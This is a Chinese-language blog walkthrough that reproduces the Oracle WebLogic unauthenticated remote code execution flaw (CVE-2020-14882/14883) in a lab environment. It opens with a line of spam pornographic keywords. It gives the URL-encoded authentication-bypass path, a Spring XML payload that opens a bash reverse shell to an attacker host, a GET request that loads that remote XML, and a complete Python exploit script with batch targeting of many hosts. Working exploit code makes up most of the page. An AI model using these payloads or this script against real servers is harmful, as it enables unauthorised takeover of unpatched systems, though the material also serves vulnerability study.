国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

CVE-2020-14882 weblogic未授權(quán)遠(yuǎn)程命令執(zhí)行漏洞

這篇具有很好參考價(jià)值的文章主要介紹了CVE-2020-14882 weblogic未授權(quán)遠(yuǎn)程命令執(zhí)行漏洞。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

一、漏洞描述

Oracle WebLogic Server 遠(yuǎn)程代碼執(zhí)行漏洞 (CVE-2020-14882)POC 被公開,未經(jīng)身份驗(yàn)證)的遠(yuǎn)程攻擊者可通過(guò)構(gòu)造特殊的 HTTP GET 請(qǐng)求,結(jié)合 CVE-2020-14883 漏洞進(jìn)行利用,利用此漏洞可在未經(jīng)身份驗(yàn)證的情況下直接接管 WebLogic Server Console ,并執(zhí)行任意代碼,利用門檻低,危害巨大

二、weblogic

WebLogic是用于開發(fā)、集成、部署和管理大型分布式Web應(yīng)用、網(wǎng)絡(luò)應(yīng)用和數(shù)據(jù)庫(kù)應(yīng)用的Java應(yīng)用服務(wù)器。將Java的動(dòng)態(tài)功能和Java Enterprise標(biāo)準(zhǔn)的安全性引入大型網(wǎng)絡(luò)應(yīng)用的開發(fā)、集成、部署和管理之中。

三、影響范圍

Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。

四、漏洞復(fù)現(xiàn)

1.開啟vulfocus靶場(chǎng)環(huán)境
cve2020-14882,CVE漏洞復(fù)現(xiàn),java,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全,web安全,Powered by 金山文檔

直接訪問(wèn)地址會(huì)發(fā)現(xiàn)無(wú)法訪問(wèn)

cve2020-14882,CVE漏洞復(fù)現(xiàn),java,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全,web安全,Powered by 金山文檔

需要在后面加上/console/login/LoginForm.jsp,發(fā)現(xiàn)以下登入頁(yè)面

cve2020-14882,CVE漏洞復(fù)現(xiàn),java,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全,web安全,Powered by 金山文檔
2.進(jìn)入后臺(tái)

嘗試用burp爆破,花時(shí)收獲甚微,這里有一個(gè)繞過(guò)驗(yàn)證漏洞,我們使用構(gòu)造URL

http://10.0.0.128:52634/console/css/%252e%252e%252fconsole.portal

成功進(jìn)入了后臺(tái),但是獲得的權(quán)限很低

cve2020-14882,CVE漏洞復(fù)現(xiàn),java,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全,web安全,Powered by 金山文檔
3.漏洞利用

來(lái)自https://github.com/GGyao/CVE-2020-14882_ALL/blob/master/README.md上的漏洞利用腳本以及方法

一、命令回顯
python3 poc.py -u http://ip:port -c “{指令}”

這里的指令使用whoami進(jìn)行測(cè)試,成功回顯

cve2020-14882,CVE漏洞復(fù)現(xiàn),java,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全,web安全,Powered by 金山文檔
二、批量命令回顯
python3 poc.py -u http://ip:port -f target.txt -c "{cmd}"

target.txt 為 ip:port目標(biāo),一行一個(gè),由于只開了一個(gè)靶機(jī),這里不復(fù)現(xiàn)

三、外置xml文件無(wú)回顯命令執(zhí)行

編輯好xml文件

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
 <value>/bin/bash</value>
        <value>-c</value>
        <value><![CDATA[bash -i >& /dev/tcp/10.0.0.127/4444  0>&1]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

修改cmd指令為反彈shell

<![CDATA[bash -i >& /dev/tcp/10.0.0.127/4444  0>&1]]>

開啟python http服務(wù),讓其能訪問(wèn)kali上的xml文件:

cve2020-14882,CVE漏洞復(fù)現(xiàn),java,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全,web安全,Powered by 金山文檔
cve2020-14882,CVE漏洞復(fù)現(xiàn),java,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全,web安全,Powered by 金山文檔

開啟nc監(jiān)聽:

cve2020-14882,CVE漏洞復(fù)現(xiàn),java,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全,web安全,Powered by 金山文檔

嘗試使用腳本中-x指令運(yùn)行,結(jié)果有訪問(wèn)記錄而無(wú)shell反彈,

嘗試在瀏覽器使用get請(qǐng)求

payload:

http://ip:port/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://kaliip/xxx.xml")

成功獲取shell:文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-566728.html

cve2020-14882,CVE漏洞復(fù)現(xiàn),java,開發(fā)語(yǔ)言,網(wǎng)絡(luò)安全,web安全,Powered by 金山文檔

poc.py

#coding:utf-8
import requests
import sys
import argparse
import http.client

http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

requests.packages.urllib3.disable_warnings()


#功能1方法:回顯命令執(zhí)行。
def command(url_cmd,headers_cmd,url):
	try:
		res = requests.get(url_cmd, headers = headers_cmd,timeout = 15, verify = False)
		if "<html" not in res.text and "<TITLE" not in res.text :
			print ("[+] Command success result:")
			print (res.text)

		else:
			print ("[-] " + url + " not vulnerable or command error!")
	except Exception as e:
		#print (e)
		print ("[-] " + url + " not vulnerable or command error!")


#功能2方法:無(wú)回顯,命令執(zhí)行,適用于Weblogic 10.x、12.x。
def weblogic_12(url_cmd,post_12,headers_12):
	try:
		res = requests.post(url_cmd, data = post_12, headers = headers_12,timeout = 15, verify = False)
		#print ("[+] Attack complete!")
	except Exception as e:
		print ("[+] Attack complete!")

def main():
	banner = """  _______      ________    ___   ___ ___   ___        __ _  _   ___   ___ ___  
 / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | || | / _ \ / _ \__ \ 
| |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | || || (_) | (_) | ) |
| |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |__   _> _ < > _ < / / 
| |____   \  /  | |____    / /_| |_| / /_| |_| |      | |  | || (_) | (_) / /_ 
 \_____|   \/   |______|  |____|\___/____|\___/       |_|  |_| \___/ \___/____|
                                                                               
                                                         Author:GGyao
                                                         Github:https://github.com/GGyao

"""

	print (banner)
	parser = argparse.ArgumentParser()
	parser.add_argument("-u", "--url", help="Target URL; Example:http://ip:port。")
	parser.add_argument("-f", "--file", help="Target File; Example:target.txt。")
	parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
	parser.add_argument("-x", "--xml", help="Remote XML file; Example:http://vpsip/poc.xml; ")
	args = parser.parse_args()

	#功能1:命令回顯。
	if args.url != None and args.cmd != None:
		url = args.url
		url_cmd = args.url + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""
		headers_cmd = {
		'User-Agent':'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
		'cmd':args.cmd,
		'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
		'Content-Type':'application/x-www-form-urlencoded'
		}

		#post_cmd = """_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.WorkAdapter+adapter+%3d+((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()%3b+java.lang.reflect.Field+field+%3d+adapter.getClass().getDeclaredField("connectionHandler")%3bfield.setAccessible(true)%3bObject+obj+%3d+field.get(adapter)%3bweblogic.servlet.internal.ServletRequestImpl+req+%3d+(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj)%3b+String+cmd+%3d+req.getHeader("cmd")%3bString[]+cmds+%3d+System.getProperty("os.name").toLowerCase().contains("window")+%3f+new+String[]{"cmd.exe",+"/c",+cmd}+%3a+new+String[]{"/bin/sh",+"-c",+cmd}%3bif(cmd+!%3d+null+){+String+result+%3d+new+java.util.Scanner(new+java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\A").next()%3b+weblogic.servlet.internal.ServletResponseImpl+res+%3d+(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req)%3b+res.getServletOutputStream().writeStream(new+weblogic.xml.util.StringInputStream(result))%3bres.getServletOutputStream().flush()%3bres.getWriter().write("")%3b}')"""

	
		#command(url_cmd,post_cmd,headers_cmd,url)
		command(url_cmd,headers_cmd,url)

	#功能2:weblogic 12.x命令執(zhí)行。
	if args.url != None and args.xml != None:
		url_cmd = args.url + '/console/images/%252e%252e/console.portal'
		headers_12 = {
		'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
		'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
		'Content-Type':'application/x-www-form-urlencoded'
		}

		post_12 = """_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22{}%22)""".format(args.xml)

		weblogic_12(url_cmd,post_12,headers_12)

	# 功能3:回顯命令執(zhí)行批量。
	if args.file != None and args.cmd != None:
		#print (1)
		for File  in open(args.file):
			File = File.strip()
			url_cmd = File + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""
			print ("[*] >>> Test:" + File)

			url = File
			headers_cmd = {
			'User-Agent':'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
			'cmd':args.cmd,
			'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
			'Content-Type':'application/x-www-form-urlencoded'
			}


			#post_cmd = """_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.WorkAdapter+adapter+%3d+((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()%3b+java.lang.reflect.Field+field+%3d+adapter.getClass().getDeclaredField("connectionHandler")%3bfield.setAccessible(true)%3bObject+obj+%3d+field.get(adapter)%3bweblogic.servlet.internal.ServletRequestImpl+req+%3d+(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj)%3b+String+cmd+%3d+req.getHeader("cmd")%3bString[]+cmds+%3d+System.getProperty("os.name").toLowerCase().contains("window")+%3f+new+String[]{"cmd.exe",+"/c",+cmd}+%3a+new+String[]{"/bin/sh",+"-c",+cmd}%3bif(cmd+!%3d+null+){+String+result+%3d+new+java.util.Scanner(new+java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\A").next()%3b+weblogic.servlet.internal.ServletResponseImpl+res+%3d+(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req)%3b+res.getServletOutputStream().writeStream(new+weblogic.xml.util.StringInputStream(result))%3bres.getServletOutputStream().flush()%3bres.getWriter().write("")%3b}')"""
			command(url_cmd,headers_cmd,url)


if __name__=="__main__":
	main()

到了這里,關(guān)于CVE-2020-14882 weblogic未授權(quán)遠(yuǎn)程命令執(zhí)行漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • CNVD-C-2019-48814 WebLogic反序列化遠(yuǎn)程命令執(zhí)行漏洞

    CNVD-C-2019-48814 WebLogic反序列化遠(yuǎn)程命令執(zhí)行漏洞

    漏洞信息??????? 漏洞名稱:OracleWebLogic wls9-async反序列化遠(yuǎn)程命令執(zhí)行漏洞(CNVD-C-2019-48814) 影響版本:- WebLogic 10.x? ? ? ? ? ? ? ? ? ? ??- WebLogic 12.1.3? 此漏洞影響啟用bea_wls9_async_response組件及wls-wsat組件的所有Weblogic版本。 漏洞評(píng)級(jí):高危 漏洞簡(jiǎn)介: WebLogic Server是美

    2023年04月08日
    瀏覽(21)
  • GoAhead遠(yuǎn)程命令執(zhí)行漏洞(CVE-2021-42342)

    GoAhead遠(yuǎn)程命令執(zhí)行漏洞(CVE-2021-42342)

    目錄 GoAhead遠(yuǎn)程命令執(zhí)行漏洞(CVE-2021-42342) 漏洞描述 漏洞復(fù)現(xiàn) 啟動(dòng)環(huán)境 復(fù)現(xiàn)漏洞 漏洞主要是由于上傳過(guò)濾器沒(méi)有設(shè)置不受信任的var位繞過(guò)CGI處理程序的前綴檢測(cè),滲透人員可以利用這個(gè)漏洞在未授權(quán)的情況下,構(gòu)造惡意程序數(shù)據(jù)執(zhí)行遠(yuǎn)程命令執(zhí)行攻擊,進(jìn)而獲得服務(wù)器的最

    2024年02月09日
    瀏覽(25)
  • CVE-2021-22205 GitLab 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    CVE-2021-22205 GitLab 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    目錄 一、漏洞信息 二、環(huán)境搭建 三、復(fù)現(xiàn)過(guò)程 1.測(cè)試漏洞 2.漏洞利用,反彈shell 四、修復(fù)建議 一、漏洞信息 漏洞名稱 GITLAB 遠(yuǎn)程命令執(zhí)行漏洞 漏洞編號(hào) CVE-2021-22205 危害等級(jí) 高危 CVSS評(píng)分 6.5 漏洞廠商 Ruby 受影響版本 11.9 = Gitlab CE/EE 13.8.8;13.9 = Gitlab CE/EE 13.9.6;13.10 = Gitlab

    2024年02月05日
    瀏覽(25)
  • 漏洞復(fù)現(xiàn)-SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721)

    漏洞復(fù)現(xiàn)-SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721)

    seacms_v10.1有效 cnvd-2020-22721 命令執(zhí)行漏洞 海洋CMS一套程序自適應(yīng)電腦、手機(jī)、平板、APP多個(gè)終端入口。 SeaCMS v10.1存在命令執(zhí)行漏洞,在w1aqhp/admin_ip.php下第五行使用set參數(shù),對(duì)用戶輸入沒(méi)有進(jìn)行任何處理,直接寫入文件。攻擊者可利用該漏洞執(zhí)行惡意代碼,獲取服務(wù)器權(quán)限。

    2024年02月08日
    瀏覽(27)
  • MS08-067 (CVE-2008-4250) 遠(yuǎn)程命令執(zhí)行漏洞

    MS08-067 (CVE-2008-4250) 遠(yuǎn)程命令執(zhí)行漏洞

    本文為08年出現(xiàn)的漏洞進(jìn)行復(fù)現(xiàn),僅作為學(xué)習(xí)參考,切勿非法利用! MS08-067漏洞是通過(guò)MSRPC over SMB通道調(diào)用Server服務(wù)程序中的NetPathCanonicalize 函數(shù)時(shí)觸發(fā)的,而NetPathCanonicalize 函數(shù)在遠(yuǎn)程訪問(wèn)其他主機(jī)時(shí),會(huì)調(diào)用NetpwPathCanonicalize函數(shù),對(duì)遠(yuǎn)程訪問(wèn)的路徑進(jìn)行規(guī)范化,而在NetpwPath

    2024年02月08日
    瀏覽(24)
  • 03Apache Solr 遠(yuǎn)程命令執(zhí)行漏洞(CVE-2019-0193)

    0x01 漏洞介紹 Apache Solr 是一個(gè)開源的搜索服務(wù)器。Solr 使用 Java 語(yǔ)言開發(fā),主要基于 HTTP 和 Apache Lucene 實(shí)現(xiàn)。 此次漏洞出現(xiàn)在 Apache Solr 的 DataImportHandler ,該模塊是一個(gè)可選但常用的模塊,用于從數(shù)據(jù)庫(kù)和其他源中提取數(shù)據(jù)。它具有一個(gè)功能,其中所有的 DIH配置都可以通過(guò)外

    2024年02月09日
    瀏覽(17)
  • CVE-2021-40444分析報(bào)告微軟MHTML遠(yuǎn)程命令執(zhí)行漏洞

    2021 年 8 月 21 日,MSTIC 觀察到一名 Mandiant 員工在社交媒體上發(fā)布的帖子,該員工具有跟蹤 Cobalt Strike Beacon 基礎(chǔ)設(shè)施的經(jīng)驗(yàn)。所寫文章重點(diǎn)介紹了一個(gè)于 2021 年 8 月 19 日上傳到 VirusTotal的 Microsoft Word 文檔(SHA-256:3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf)。 MSTIC 對(duì)樣

    2024年02月08日
    瀏覽(31)
  • Jupyter Notebook 未授權(quán)訪問(wèn)遠(yuǎn)程命令執(zhí)行漏洞

    Jupyter Notebook 未授權(quán)訪問(wèn)遠(yuǎn)程命令執(zhí)行漏洞

    Jupyter是一個(gè)開源的交互式計(jì)算環(huán)境,它支持多種編程語(yǔ)言,包括Python、R、Julia等。Jupyter的名稱來(lái)源于三種編程語(yǔ)言的縮寫:Ju(lia)、Py(thon)和R。 Jupyter的主要特點(diǎn)是它以筆記本(Notebook)的形式組織代碼、文本和多媒體內(nèi)容。筆記本可以包含代碼、注釋、圖表、公式和可運(yùn)行的

    2024年02月14日
    瀏覽(20)
  • Spring Data Commons遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)(CVE-2018-1273)

    Spring Data Commons遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)(CVE-2018-1273)

    一、漏洞說(shuō)明 Spring Data是一個(gè)用于簡(jiǎn)化數(shù)據(jù)庫(kù)訪問(wèn),并支持云服務(wù)的開源框架,包含Commons、Gemfire、JPA、JDBC、MongoDB等模塊。此漏洞產(chǎn)生于Spring Data Commons組件,該組件為提供共享的基礎(chǔ)框架,適合各個(gè)子項(xiàng)目使用,支持跨數(shù)據(jù)庫(kù)持久化。 Spring Data Commons組件中存在遠(yuǎn)程代碼執(zhí)行

    2024年02月09日
    瀏覽(21)
  • CVE-2021-44228 Apache log4j 遠(yuǎn)程命令執(zhí)行漏洞

    CVE-2021-44228 Apache log4j 遠(yuǎn)程命令執(zhí)行漏洞

    一、漏洞原理 log4j(log for java)是由Java編寫的可靠、靈活的日志框架,是Apache旗下的一個(gè)開源項(xiàng)目,使用Log4j,我們更加方便的記錄了日志信息,它不但能控制日志輸出的目的地,也能控制日志輸出的內(nèi)容格式;通過(guò)定義不同的日志級(jí)別,可以更加精確的控制日志的生成過(guò)程,

    2024年02月08日
    瀏覽(33)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包